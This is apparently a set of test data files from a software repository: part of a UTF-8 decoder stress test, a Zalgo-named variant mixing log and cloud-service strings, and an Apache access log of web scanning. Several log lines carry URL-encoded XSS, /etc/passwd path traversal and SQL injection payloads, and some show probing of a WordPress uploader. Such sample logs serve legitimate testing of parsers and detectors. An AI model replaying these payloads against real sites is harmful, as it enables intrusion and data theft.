105 | 3.1.2  Last  continuation byte 0xbf: "�"                                      |
106 |                                                                               |
107 | 3.1.3  2 continuation bytes: "��"                                             |
108 | 3.1.4  3 continuation bytes: "���"                                            |
109 | 3.1.5  4 continuation bytes: "����"                                           |
110 | 3.1.6  5 continuation bytes: "�����"                                          |
111 | 3.1.7  6 continuation bytes: "������"                                         |
112 | 3.1.8  7 continuation bytes: "�������"                                        |
113 |                                                                               |
114 | 3.1.9  Sequence of all 64 possible continuation bytes (0x80-0xbf):            |
115 |                                                                               |
116 |    "����������������                                                          |
117 |     ����������������                                                          |
118 |     ����������������                                                          |
119 |     ����������������"                                                         |
120 |                                                                               |
121 | 3.2  Lonely start characters                                                  |
122 |                                                                               |
123 | 3.2.1  All 32 first bytes of 2-byte sequences (0xc0-0xdf),                    |
124 |        each followed by a space character:                                    |
125 |                                                                               |
126 |    "� � � � � � � � � � � � � � � �                                           |
127 |     � � � � � � � � � � � � � � � � "                                         |
128 |                                                                               |
129 | 3.2.2  All 16 first bytes of 3-byte sequences (0xe0-0xef),                    |
130 |        each followed by a space character:                                    |
131 |                                                                               |
132 |    "� � � � � � � � � � � � � � � � "                                         |
133 |                                                                               |
134 | 3.2.3  All 8 first bytes of 4-byte sequences (0xf0-0xf7),                     |
135 |        each followed by a space character:                                    |
136 |                                                                               |
137 |    "� � � � � � � � "                                                         |
138 |                                                                               |
139 | 3.2.4  All 4 first bytes of 5-byte sequences (0xf8-0xfb),                     |
140 |        each followed by a space character:                                    |
141 |                                                                               |
142 |    "� � � � "                                                                 |
143 |                                                                               |
144 | 3.2.5  All 2 first bytes of 6-byte sequences (0xfc-0xfd),                     |
145 |        each followed by a space character:                                    |
146 |                                                                               |
147 |    "� � "                                                                     |
148 |                                                                               |
149 | 3.3  Sequences with last continuation byte missing                            |
150 |                                                                               |
151 | All bytes of an incomplete sequence should be signalled as a single           |
152 | malformed sequence, i.e., you should see only a single replacement            |
153 | character in each of the next 10 tests. (Characters as in section 2)          |
154 |                                                                               |
155 | 3.3.1  2-byte sequence with last byte missing (U+0000):     "�"               |
156 | 3.3.2  3-byte sequence with last byte missing (U+0000):     "��"               |
157 | 3.3.3  4-byte sequence with last byte missing (U+0000):     "���"               |
158 | 3.3.4  5-byte sequence with last byte missing (U+0000):     "����"               |
159 | 3.3.5  6-byte sequence with last byte missing (U+0000):     "�����"               |
160 | 3.3.6  2-byte sequence with last byte missing (U-000007FF): "�"               |
161 | 3.3.7  3-byte sequence with last byte missing (U-0000FFFF): "�"               |
162 | 3.3.8  4-byte sequence with last byte missing (U-001FFFFF): "���"               |
163 | 3.3.9  5-byte sequence with last byte missing (U-03FFFFFF): "����"               |
164 | 3.3.10 6-byte sequence with last byte missing (U-7FFFFFFF): "�����"               |
165 |                                                                               |
166 | 3.4  Concatenation of incomplete sequences                                    |
167 |                                                                               |
168 | All the 10 sequences of 3.3 concatenated, you should see 10 malformed         |
169 | sequences being signalled:                                                    |
170 |                                                                               |
171 |    "�����������������������������"                                                               |
172 |                                                                               |
173 | 3.5  Impossible bytes                                                         |
174 |                                                                               |
175 | The following two bytes cannot appear in a correct UTF-8 string               |
176 |                                                                               |
177 | 3.5.1  fe = "�"                                                               |
178 | 3.5.2  ff = "�"                                                               |
179 | 3.5.3  fe fe ff ff = "����"                                                   |
180 |                                                                               |
181 | 4  Overlong sequences                                                         |
182 |                                                                               |
183 | The following sequences are not malformed according to the letter of          |
184 | the Unicode 2.0 standard. However, they are longer then necessary and         |
185 | a correct UTF-8 encoder is not allowed to produce them. A "safe UTF-8         |
186 | decoder" should reject them just like malformed sequences for two             |
187 | reasons: (1) It helps to debug applications if overlong sequences are         |
188 | not treated as valid representations of characters, because this helps        |
189 | to spot problems more quickly. (2) Overlong sequences provide                 |
190 | alternative representations of characters, that could maliciously be          |
191 | used to bypass filters that check only for ASCII characters. For              |
192 | instance, a 2-byte encoded line feed (LF) would not be caught by a            |
193 | line counter that counts only 0x0a bytes, but it would still be               |
194 | processed as a line feed by an unsafe UTF-8 decoder later in the              |
195 | pipeline. From a security point of view, ASCII compatibility of UTF-8         |
196 | sequences means also, that ASCII characters are *only* allowed to be          |
197 | represented by ASCII bytes in the range 0x00-0x7f. To ensure this             |
198 | aspect of ASCII compatibility, use only "safe UTF-8 decoders" that            |
199 | reject overlong UTF-8 sequences for which a shorter encoding exists.          |
200 |                                                                               |
201 | 4.1  Examples of an overlong ASCII character                                  |
202 |                                                                               |
203 | With a safe UTF-8 decoder, all of the following five overlong                 |
204 | representations of the ASCII character slash ("/") should be rejected         |
205 | like a malformed UTF-8 sequence, for instance by substituting it with         |
206 | a replacement character. If you see a slash below, you do not have a          |
207 | safe UTF-8 decoder!                                                           |
208 |                                                                               |
209 | 4.1.1 U+002F = c0 af             = "��"                                        |
210 | 4.1.2 U+002F = e0 80 af          = "���"                                        |
211 | 4.1.3 U+002F = f0 80 80 af       = "����"                                        |
212 | 4.1.4 U+002F = f8 80 80 80 af    = "�����"                                        |
213 | 4.1.5 U+002F = fc 80 80 80 80 af = "������"                                        |
214 |                                                                               |
215 | 4.2  Maximum overlong sequences                                               |
216 |                                                                               |
217 | Below you see the highest Unicode value that is still resulting in an         |
218 | overlong sequence if represented with the given number of bytes. This         |
219 | is a boundary test for safe UTF-8 decoders. All five characters should        |
220 | be rejected like malformed UTF-8 sequences.                                   |
221 |                                                                               |
222 | 4.2.1  U-0000007F = c1 bf             = "��"                                   |
223 | 4.2.2  U-000007FF = e0 9f bf          = "���"                                   |
224 | 4.2.3  U-0000FFFF = f0 8f bf bf       = "����"                                   |
225 | 4.2.4  U-001FFFFF = f8 87 bf bf bf    = "�����"                                   |
226 | 4.2.5  U-03FFFFFF = fc 83 bf bf bf bf = "������"                                   |
227 |                                                                               |
228 | 4.3  Overlong representation of the NUL character                             |
229 |                                                                               |
230 | The following five sequences should also be rejected like malformed           |
231 | UTF-8 sequences and should not be treated like the ASCII NUL                  |
232 | character.                                                                    |
233 |                                                                               |
234 | 4.3.1  U+0000 = c0 80             = "��"                                       |
235 | 4.3.2  U+0000 = e0 80 80          = "���"                                       |
236 | 4.3.3  U+0000 = f0 80 80 80       = "����"                                       |
237 | 4.3.4  U+0000 = f8 80 80 80 80    = "�����"                                       |
238 | 4.3.5  U+0000 = fc 80 80 80 80 80 = "������"                                       |
239 |                                                                               |
240 | 5  Illegal code positions                                                     |
241 |                                                                               |
242 | The following UTF-8 sequences should be rejected like malformed               |
243 | sequences, because they never represent valid ISO 10646 characters and        |
244 | a UTF-8 decoder that accepts them might introduce security problems           |
245 | comparable to overlong UTF-8 sequences.                                       |
246 |                                                                               |
247 | 5.1 Single UTF-16 surrogates                                                  |
248 |                                                                               |
249 | 5.1.1  U+D800 = ed a0 80 = "���"                                                |
250 | 5.1.2  U+DB7F = ed ad bf = "���"                                                |
251 | 5.1.3  U+DB80 = ed ae 80 = "���"                                                |
252 | 5.1.4  U+DBFF = ed af bf = "���"                                                |
253 | 5.1.5  U+DC00 = ed b0 80 = "���"                                                |
254 | 5.1.6  U+DF80 = ed be 80 = "���"                                                |
255 | 5.1.7  U+DFFF = ed bf bf = "���"                                                |
256 |                                                                               |
257 | 5.2 Paired UTF-16 surrogates                                                  |
258 |                                                                               |
259 | 5.2.1  U+D800 U+DC00 = ed a0 80 ed b0 80 = "������"                               |
260 | 5.2.2  U+D800 U+DFFF = ed a0 80 ed bf bf = "������"                               |
261 | 5.2.3  U+DB7F U+DC00 = ed ad bf ed b0 80 = "������"                               |
262 | 5.2.4  U+DB7F U+DFFF = ed ad bf ed bf bf = "������"                               |
263 | 5.2.5  U+DB80 U+DC00 = ed ae 80 ed b0 80 = "������"                               |
264 | 5.2.6  U+DB80 U+DFFF = ed ae 80 ed bf bf = "������"                               |
265 | 5.2.7  U+DBFF U+DC00 = ed af bf ed b0 80 = "������"                               |
266 | 5.2.8  U+DBFF U+DFFF = ed af bf ed bf bf = "������"                               |
267 |                                                                               |
268 | 5.3 Noncharacter code positions                                               |
269 |                                                                               |
270 | The following "noncharacters" are "reserved for internal use" by              |
271 | applications, and according to older versions of the Unicode Standard         |
272 | "should never be interchanged". Unicode Corrigendum #9 dropped the            |
273 | latter restriction. Nevertheless, their presence in incoming UTF-8 data       |
274 | can remain a potential security risk, depending on what use is made of        |
275 | these codes subsequently. Examples of such internal use:                      |
276 |                                                                               |
277 |  - Some file APIs with 16-bit characters may use the integer value -1         |
278 |    = U+FFFF to signal an end-of-file (EOF) or error condition.                |
279 |                                                                               |
280 |  - In some UTF-16 receivers, code point U+FFFE might trigger a                |
281 |    byte-swap operation (to convert between UTF-16LE and UTF-16BE).            |
282 |                                                                               |
283 | With such internal use of noncharacters, it may be desirable and safer        |
284 | to block those code points in UTF-8 decoders, as they should never            |
285 | occur legitimately in incoming UTF-8 data, and could trigger unsafe           |
286 | behaviour in subsequent processing.                                           |
287 |                                                                               |
288 | Particularly problematic noncharacters in 16-bit applications:                |
289 |                                                                               |
290 | 5.3.1  U+FFFE = ef bf be = "￾"                                                |
291 | 5.3.2  U+FFFF = ef bf bf = "￿"                                                |
292 |                                                                               |
293 | Other noncharacters:                                                          |
294 |                                                                               |
295 | 5.3.3  U+FDD0 .. U+FDEF = "﷐﷑﷒﷓﷔﷕﷖﷗﷘﷙﷚﷛﷜﷝﷞﷟﷠﷡﷢﷣﷤﷥﷦﷧﷨﷩﷪﷫﷬﷭﷮﷯"|
296 |                                                                               |
297 | 5.3.4  U+nFFFE U+nFFFF (for n = 1..10)                                        |
298 |                                                                               |
299 |        "🿾🿿𯿾𯿿𿿾𿿿񏿾񏿿񟿾񟿿񯿾񯿿񿿾񿿿򏿾򏿿                                    |
300 |         򟿾򟿿򯿾򯿿򿿾򿿿󏿾󏿿󟿾󟿿󯿾󯿿󿿾󿿿􏿾􏿿"                                   |
301 |                                                                               |
302 | THE END                                                                       |
303 | 


--------------------------------------------------------------------------------
/tests/data/UTF-8-test_filename_ŀĔ_TH̘Ë͖́̉ ͠P̯͍̭O̚​N̐Y̡ H̸̡̪̯ͨ͊̽̅̾̎Ȩ̬̩̾͛ͪ̈́̀́͘ ̶̧̨̱̹̭̯ͧ̾ͬC̷̙̲̝͖ͭ̏ͥͮ͟Oͮ͏̮̪̝͍M̲̖͊̒ͪͩͬ̚̚͜Ȇ̴̟̟͙̞ͩ͌͝S̨̥̫͎̭ͯ̿̔̀ͅ.txt:
--------------------------------------------------------------------------------
 1 | 2021-07-07T16:46:30.000ZUTF-8 decoder capability and stress test INFO Starting up agent subsystem INFO [ssm-session-worker]User name,AWS access key,Event time"serviceName": "guardduty""schemaVersion"
 2 | ----------------------------------------
 3 | 
 4 | 
 5 | You can't parse [X]HTML with regex. Because HTML can't be parsed by regex. Regex is not a tool that can be used to correctly parse HTML. As I have answered in HTML-and-regex questions here so many times before, the use of regex will not allow you to consume HTML. Regular expressions are a tool that is insufficiently sophisticated to understand the constructs employed by HTML. HTML is not a regular language and hence cannot be parsed by regular expressions. Regex queries are not equipped to break down HTML into its meaningful parts. so many times but it is not getting to me. Even enhanced irregular regular expressions as used by Perl are not up to the task of parsing HTML. You will never make me crack. HTML is a language of sufficient complexity that it cannot be parsed by regular expressions. Even Jon Skeet cannot parse HTML using regular expressions. Every time you attempt to parse HTML with regular expressions, the unholy child weeps the blood of virgins, and Russian hackers pwn your webapp. Parsing HTML with regex summons tainted souls into the realm of the living. HTML and regex go together like love, marriage, and ritual infanticide. The <center> cannot hold it is too late. The force of regex and HTML together in the same conceptual space will destroy your mind like so much watery putty. If you parse HTML with regex you are giving in to Them and their blasphemous ways which doom us all to inhuman toil for the One whose Name cannot be expressed in the Basic Multilingual Plane, he comes. HTML-plus-regexp will liquify the n​erves of the sentient whilst you observe, your psyche withering in the onslaught of horror. Rege̿̔̉x-based HTML parsers are the cancer that is killing StackOverflow it is too late it is too late we cannot be saved the transgression of a chi͡ld ensures regex will consume all living tissue (except for HTML which it cannot, as previously prophesied) dear lord help us how can anyone survive this scourge using regex to parse HTML has doomed humanity to an eternity of dread torture and security holes using regex as a tool to process HTML establishes a breach between this world and the dread realm of c͒ͪo͛ͫrrupt entities (like SGML entities, but more corrupt) a mere glimpse of the world of reg​ex parsers for HTML will ins​tantly transport a programmer's consciousness into a world of ceaseless screaming, he comes, the pestilent slithy regex-infection wil​l devour your HT​ML parser, application and existence for all time like Visual Basic only worse he comes he comes do not fi​ght he com̡e̶s, ̕h̵i​s un̨ho͞ly radiańcé destro҉ying all enli̍̈́̂̈́ghtenment, HTML tags lea͠ki̧n͘g fr̶ǫm ̡yo​͟ur eye͢s̸ ̛l̕ik͏e liq​uid pain, the song of re̸gular exp​ression parsing will exti​nguish the voices of mor​tal man from the sp​here I can see it can you see ̲͚̖͔̙î̩́t̲͎̩̱͔́̋̀ it is beautiful t​he final snuffing of the lie​s of Man ALL IS LOŚ͖̩͇̗̪̏̈́T ALL I​S LOST the pon̷y he comes he c̶̮omes he comes the ich​or permeates all MY FACE MY FACE ᵒh god no NO NOO̼O​O NΘ stop the an​*̶͑̾̾​̅ͫ͏̙̤g͇̫͛͆̾ͫ̑͆l͖͉̗̩̳̟̍ͫͥͨe̠̅s ͎a̧͈͖r̽̾̈́͒͑e n​ot rè̑ͧ̌aͨl̘̝̙̃ͤ͂̾̆ ZA̡͊͠͝LGΌ ISͮ̂҉̯͈͕̹̘̱ TO͇̹̺ͅƝ̴ȳ̳ TH̘Ë͖́̉ ͠P̯͍̭O̚​N̐Y̡ H̸̡̪̯ͨ͊̽̅̾̎Ȩ̬̩̾͛ͪ̈́̀́͘ ̶̧̨̱̹̭̯ͧ̾ͬC̷̙̲̝͖ͭ̏ͥͮ͟Oͮ͏̮̪̝͍M̲̖͊̒ͪͩͬ̚̚͜Ȇ̴̟̟͙̞ͩ͌͝S̨̥̫͎̭ͯ̿̔̀ͅ
 6 | Markus Kuhn <http://www.cl.cam.ac.uk/~mgk25/> - 2015-08-28 - CC BY 4.0
 7 | 
 8 | This test file can help you examine, how your UTF-8 decoder handles
 9 | various types of correct, malformed, or otherwise interesting UTF-8
10 | sequences. This file is not meant to be a conformance test. It does
11 | not prescribe any particular outcome. Therefore, there is no way to
12 | "pass" or "fail" this test file, even though the text does suggest a
13 | preferable decoder behaviour at some places. Its aim is, instead, to
14 | help you think about, and test, the behaviour of your UTF-8 decoder on a
15 | systematic collection of unusual inputs. Experience so far suggests
16 | that most first-time authors of UTF-8 decoders find at least one
17 | serious problem in their decoder using this file.
18 | 
19 | The test lines below cover boundary conditions, malformed UTF-8
20 | sequences, as well as correctly encoded UTF-8 sequences of Unicode code
21 | points that should never occur in a correct UTF-8 file.
22 | 
23 | According to ISO 10646-1:2000, sections D.7 and 2.3c, a device
24 | receiving UTF-8 shall interpret a "malformed sequence in the same way
25 | that it interprets a character that is outside the adopted subset" and
26 | "characters that are not within the adopted subset shall be indicated
27 | to the user" by a receiving device. One commonly used approach in
28 | UTF-8 decoders is to replace any malformed UTF-8 sequence by a
29 | replacement character (U+FFFD), which looks a bit like an inverted
30 | question mark, or a similar symbol. It might be a good idea to
31 | visually distinguish a malformed UTF-8 sequence from a correctly
32 | encoded Unicode character that is just not available in the current
33 | font but otherwise fully legal, even though ISO 10646-1 doesn't
34 | mandate this. In any case, just ignoring malformed sequences or
35 | unavailable characters does not conform to ISO 10646, will make
36 | debugging more difficult, and can lead to user confusion.
37 | 
38 | Please check, whether a malformed UTF-8 sequence is (1) represented at
39 | all, (2) represented by exactly one single replacement character (or
40 | equivalent signal), and (3) the following quotation mark after an
41 | illegal UTF-8 sequence is correctly displayed, i.e. proper
42 | resynchronization takes place immediately after any malformed
43 | sequence. This file says "THE END" in the last line, so if you don't
44 | see that, your decoder crashed somehow before, which should always be
45 | cause for concern.
46 | 
47 | All lines in this file are exactly 79 characters long (plus the line
48 | feed). In addition, all lines end with "|", except for the two test
49 | lines 2.1.1 and 2.2.1, which contain non-printable ASCII controls
50 | U+0000 and U+007F. If you display this file with a fixed-width font,
51 | these "|" characters should all line up in column 79 (right margin).
52 | This allows you to test quickly, whether your UTF-8 decoder finds the
53 | correct number of characters in every line, that is whether each
54 | malformed sequences is replaced by a single replacement character.
55 | 
56 | Note that, as an alternative to the notion of malformed sequence used
57 | here, it is also a perfectly acceptable (and in some situations even
58 | preferable) solution to represent each individual byte of a malformed
59 | sequence with a replacement character. If you follow this strategy in
60 | your decoder, then please ignore the "|" column.
61 | 
62 | 
63 | Here come the tests:                                                          |
64 |                                                                               |
65 | 1  Some correct UTF-8 text                                                    |
66 |                                                                               |
67 | You should see the Greek word 'kosme':       "κόσμε"                          |
68 |                                                                               |
69 | 2  Boundary condition test cases                                              |
70 |                                                                               |
71 | 2.1  First possible sequence of a certain length                              |
72 |                                                                               |
73 | 2.1.1  1 byte  (U-00000000):        "


--------------------------------------------------------------------------------
/tests/data/apache_access.log:
--------------------------------------------------------------------------------
 1 | 86.166.103.163 - - [19/Jul/2020:20:14:39 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36"
 2 | 86.166.103.163 - - [19/Jul/2020:20:14:39 +0000] "GET /icons/openlogo-75.png HTTP/1.1" 200 6040 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36"
 3 | 86.166.103.163 - - [19/Jul/2020:20:14:39 +0000] "GET /favicon.ico HTTP/1.1" 404 517 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36"
 4 | 86.166.103.163 - - [19/Jul/2020:20:16:34 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36"
 5 | 86.166.103.163 - - [19/Jul/2020:20:16:37 +0000] "GET /test.php HTTP/1.1" 200 204 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36"
 6 | 86.166.103.163 - - [19/Jul/2020:20:39:04 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36"
 7 | 40.76.227.225 - - [19/Jul/2020:20:39:21 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
 8 | 40.76.227.225 - - [19/Jul/2020:20:39:22 +0000] "GET /wp-links-opml.php?user-agent=Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.143+Safari%2F537.36 HTTP/1.1" 500 185 "-" "python-requests/2.23.0"
 9 | 40.76.227.225 - - [19/Jul/2020:20:39:22 +0000] "GET /wp-content/themes/???/style.css HTTP/1.1" 200 203 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
10 | 45.76.91.240 - - [19/Jul/2020:20:39:27 +0000] "HEAD / HTTP/1.1" 200 255 "-" "-"
11 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET / HTTP/1.1" 200 3324 "https://sucuri.net" "Mozilla/5.0 SomeLine (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"
12 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "TRACE / HTTP/1.1" 405 506 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
13 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET /.git/HEAD HTTP/1.1" 404 462 "https://sucuri.net" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"
14 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET /404javascript.js HTTP/1.1" 404 462 "https://www.google.com/url/?sa=t" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"
15 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET /404testpage4525d2fdc HTTP/1.1" 404 462 "https://sucuri.net" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"
16 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET / HTTP/1.1" 200 3324 "https://www.google.com/images/url" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET /manual HTTP/1.1" 404 462 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
18 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET / HTTP/1.1" 200 3324 "-" "Mozilla/5.0 (iPad; CPU OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1"
19 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "GET / HTTP/1.1" 200 3324 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)"
20 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "GET / HTTP/1.1" 200 3324 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)"
21 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "HEAD / HTTP/1.1" 200 283 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)"
22 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "GET /2d1983f.html HTTP/1.1" 404 462 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)"
23 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "HEAD /wp-content/ HTTP/1.1" 200 128 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)"
24 | 209.250.238.112 - - [19/Jul/2020:20:40:00 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3770.100 Safari/537.36"
25 | 209.250.238.112 - - [19/Jul/2020:20:40:00 +0000] "GET /?a=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&c=..%2F..%2F..%2F..%2Fetc%2Fpasswd&b=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3770.100 Safari/537.36"
26 | 209.250.238.112 - - [19/Jul/2020:20:40:00 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3770.100 Safari/537.36"
27 | 209.250.238.112 - - [19/Jul/2020:20:40:01 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3770.100 Safari/537.36"
28 | 209.250.238.112 - - [19/Jul/2020:20:40:01 +0000] "GET /?s=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 3380 "-" "python-requests/2.22.0"
29 | 209.250.238.112 - - [19/Jul/2020:20:40:01 +0000] "GET / HTTP/1.1" 200 3380 "-" "python-requests/2.22.0"
30 | 209.250.238.112 - - [19/Jul/2020:20:40:01 +0000] "GET /?s=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 3380 "-" "python-requests/2.22.0"
31 | 185.220.101.194 - - [19/Jul/2020:20:40:41 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
32 | 185.220.101.194 - - [19/Jul/2020:20:40:41 +0000] "GET /icons/openlogo-75.png HTTP/1.1" 200 6040 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
33 | 185.220.101.194 - - [19/Jul/2020:20:40:41 +0000] "GET /favicon.ico HTTP/1.1" 404 518 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
34 | 185.220.101.194 - - [19/Jul/2020:20:41:24 +0000] "GET /wp-content HTTP/1.1" 301 666 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
35 | 185.220.101.194 - - [19/Jul/2020:20:41:25 +0000] "GET /wp-content/ HTTP/1.1" 200 736 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
36 | 185.220.101.194 - - [19/Jul/2020:20:41:25 +0000] "GET /icons/blank.gif HTTP/1.1" 200 431 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
37 | 185.220.101.194 - - [19/Jul/2020:20:41:25 +0000] "GET /icons/back.gif HTTP/1.1" 200 500 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
38 | 185.220.101.194 - - [19/Jul/2020:20:41:25 +0000] "GET /icons/folder.gif HTTP/1.1" 200 509 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
39 | 185.220.101.194 - - [19/Jul/2020:20:41:27 +0000] "GET /wp-content/plugins/ HTTP/1.1" 200 787 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
40 | 185.220.101.194 - - [19/Jul/2020:20:41:27 +0000] "GET /icons/unknown.gif HTTP/1.1" 200 528 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
41 | 185.220.101.194 - - [19/Jul/2020:20:41:29 +0000] "GET /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 480 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
42 | 185.220.101.194 - - [19/Jul/2020:20:42:18 +0000] "POST /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 494 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/wordpress_uploader.php" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
43 | 185.220.101.194 - - [19/Jul/2020:20:42:24 +0000] "POST /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 494 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/wordpress_uploader.php" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
44 | 185.220.101.194 - - [19/Jul/2020:20:42:30 +0000] "POST /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 499 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/wordpress_uploader.php" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
45 | 185.220.101.194 - - [19/Jul/2020:20:42:34 +0000] "POST /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 504 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/wordpress_uploader.php" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
46 | 185.220.101.194 - - [19/Jul/2020:20:43:04 +0000] "GET /wp-content/plugins/uploads HTTP/1.1" 301 698 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
47 | 185.220.101.194 - - [19/Jul/2020:20:43:05 +0000] "GET /wp-content/plugins/uploads/ HTTP/1.1" 200 792 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
48 | 185.220.101.194 - - [19/Jul/2020:20:43:05 +0000] "GET /icons/text.gif HTTP/1.1" 200 512 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/uploads/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"
